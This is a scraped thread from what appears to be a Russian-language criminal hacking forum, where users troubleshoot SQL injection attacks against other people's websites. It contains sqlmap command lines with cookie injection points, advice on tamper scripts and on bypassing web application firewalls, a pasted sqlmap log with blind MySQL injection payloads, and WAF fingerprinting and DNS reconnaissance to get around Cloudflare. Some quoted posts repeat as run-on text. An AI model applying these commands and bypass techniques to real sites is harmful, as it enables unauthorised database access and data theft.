Тоже стало интересно по этому таргету, на какой-то поке из предоставленных тобою и окунем выдало баннер с ошибкой sql, при повторных тестах не появлялось больше
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
Убери параметр -p и добавь dbms=mssql . Также смотри , что отвечает сервер.
Ответом приходит html страница, как и должно быть.
На сайте есть WAF (движок DLE) и мапа его видит, пытаясь засунуть в GET параметры скулю, на что получает ответ "Hacking attempt!", но не знаю, фильтрует ли WAF значение кукисов или нет. (с скулей в куках ответа "Hacking attempt!" нет).
Зачем get, если у тебя в куках уязвимость ?
get был в запросе от окуня, и мапа проверят наличие waf'a гетом. Сменив запрос на post все еще не находит уязвимость.
--url="https://example.com/vrgames/simulate/" --cookie="adtech_uid=ca993490-2349-42e3-ab4b-01347d29e9b4:example.com*" --dbms=mssql --batch --random-agent
Возможно ошибся и скорее всего --dbms=postgresql
была такаяже проблема , выше спрашивал, так же окунь вывел название бд, но мапом я так и не открыл его. В этой или другой ветке советовали попробовать как вриант вот этот аналог мапы, к стати одну цель мне получилось открыть, хотя паралельно мап даже не дошел до бд.
GitHub - r0oth3x49/ghauri: An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws - r0oth3x49/ghauri
github.com
Последнее редактирование:
У мапы есть полезная функция -v 3 через нее посмотреть что она отправляет и что получает, бывает помогает понять в чем проблема и почему мапа не видит дыру, и так же тамперы подбирать удобнее
Как в паме без sql-shell посмотреть обновления в таблице без использования --flush-session и --purge? Чтобы не сканировать заного сайт?
--fresh-queries
Если при id=' получаю Syntex error mysql всегда ли эта уязвимость? Уже, что не пробовал, не могу пробить. might be not enjectable
What can I do? When I tested website with sqlmap, I received many time-based blind injection - parameters "sSellerID, sName, sCase", but at the end all of them result is same - "false positive or unexploitable"
Помогитте пожалуйста определить что за WAF и как его можно обойти
попалась уже 3 тья цель с каким то непонятным WAF или блоком , я пробовал по примеру ModSecurity убирать фильтры с select union slleep итд , начал перекрыватьк аждое слово , через время там где прокатывало опять начинал срабатывать ваф. Вот еще один такой же попался
[02:27:02] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
потом понятное дело результат такой
помогите пожалуйста , реально не пойму , вроде бы и цели не такие уж большие.
попалась уже 3 тья цель с каким то непонятным WAF или блоком , я пробовал по примеру ModSecurity убирать фильтры с select union slleep итд , начал перекрыватьк аждое слово , через время там где прокатывало опять начинал срабатывать ваф. Вот еще один такой же попался
[02:27:02] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
Код:
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 695 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Payload: createdate=2023-5-3 14:44:18&email=testing@example.com' AND MAKE_SET(4404=4404,1771)-- Bagi&status=0
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: createdate=2023-5-3 14:44:18&email=testing@example.com' AND 9556=BENCHMARK(32000000,MD5(0x48694562))-- eSsS&status=0
---
[02:57:46] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:57:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 7.2.34
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[02:57:47] [INFO] fetching database names
[02:57:47] [INFO] fetching number of databases
[02:57:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:57:47] [INFO] retrieved:
[02:57:48] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases
[02:57:51] [INFO] retrieved:
[02:57:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[02:57:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[02:57:55] [ERROR] unable to retrieve the number of databases
[02:57:55] [INFO] falling back to current database
[02:57:55] [INFO] fetching current database
[02:57:55] [INFO] retrieved:
[02:57:59] [INFO] retrieved:
[02:58:03] [CRITICAL] unable to retrieve the database names
[02:58:03] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 307 times, 500 (Internal Server Error) - 314 times
Код:
~ WAFW00F : v2.2.0 ~
The Web Application Firewall Fingerprinting Toolkit
[*] Checking https://www.test.com
[+] Generic Detection results:
[*] The site https://www.test.com seems to be behind a WAF or some sort of security solution
[~] Reason: The server returns a different response code when an attack string is used.
Normal response code is "200", while the response code to cross-site scripting attack is "404"
[~] Number of requests: 5
разведай DNS, там увидишь, может быть клаудфлейр тебе меншаетПомогитте пожалуйста определить что за WAF и как его можно обойти
попалась уже 3 тья цель с каким то непонятным WAF или блоком , я пробовал по примеру ModSecurity убирать фильтры с select union slleep итд , начал перекрыватьк аждое слово , через время там где прокатывало опять начинал срабатывать ваф. Вот еще один такой же попался
[02:27:02] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
потом понятное дело результат такой
Код:(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 695 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: createdate=2023-5-3 14:44:18&email=testing@example.com' AND MAKE_SET(4404=4404,1771)-- Bagi&status=0 Type: time-based blind Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK) Payload: createdate=2023-5-3 14:44:18&email=testing@example.com' AND 9556=BENCHMARK(32000000,MD5(0x48694562))-- eSsS&status=0 --- [02:57:46] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [02:57:46] [INFO] the back-end DBMS is MySQL web application technology: Apache, PHP 7.2.34 back-end DBMS: MySQL < 5.0.12 (MariaDB fork) [02:57:47] [INFO] fetching database names [02:57:47] [INFO] fetching number of databases [02:57:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [02:57:47] [INFO] retrieved: [02:57:48] [WARNING] unexpected HTTP code '404' detected. Will use (extra) validation step in similar cases [02:57:51] [INFO] retrieved: [02:57:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions [02:57:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex' [02:57:55] [ERROR] unable to retrieve the number of databases [02:57:55] [INFO] falling back to current database [02:57:55] [INFO] fetching current database [02:57:55] [INFO] retrieved: [02:57:59] [INFO] retrieved: [02:58:03] [CRITICAL] unable to retrieve the database names [02:58:03] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 307 times, 500 (Internal Server Error) - 314 times
помогите пожалуйста , реально не пойму , вроде бы и цели не такие уж большие.Код:~ WAFW00F : v2.2.0 ~ The Web Application Firewall Fingerprinting Toolkit [*] Checking https://www.test.com [+] Generic Detection results: [*] The site https://www.test.com seems to be behind a WAF or some sort of security solution [~] Reason: The server returns a different response code when an attack string is used. Normal response code is "200", while the response code to cross-site scripting attack is "404" [~] Number of requests: 5
а можно поподробней пожалуйста, прверил https://search.censys.io , никакого упоминания claud не нашел, ну если я там смотрю конечно
dnsrecon попробуй
ну через
тоже самое показывает про клауд ничего нет, ну или опять же я может не так что то делаю.
[*] Enumerating SRV Records
[+] 0 Records Found
─$ dnsrecon -d site.com
тоже самое показывает про клауд ничего нет, ну или опять же я может не так что то делаю.
[*] Enumerating SRV Records
[+] 0 Records Found
Мне нужна поисковая система, которая ищет сайты с нужными технологиями, какие-нибудь советы?
thanks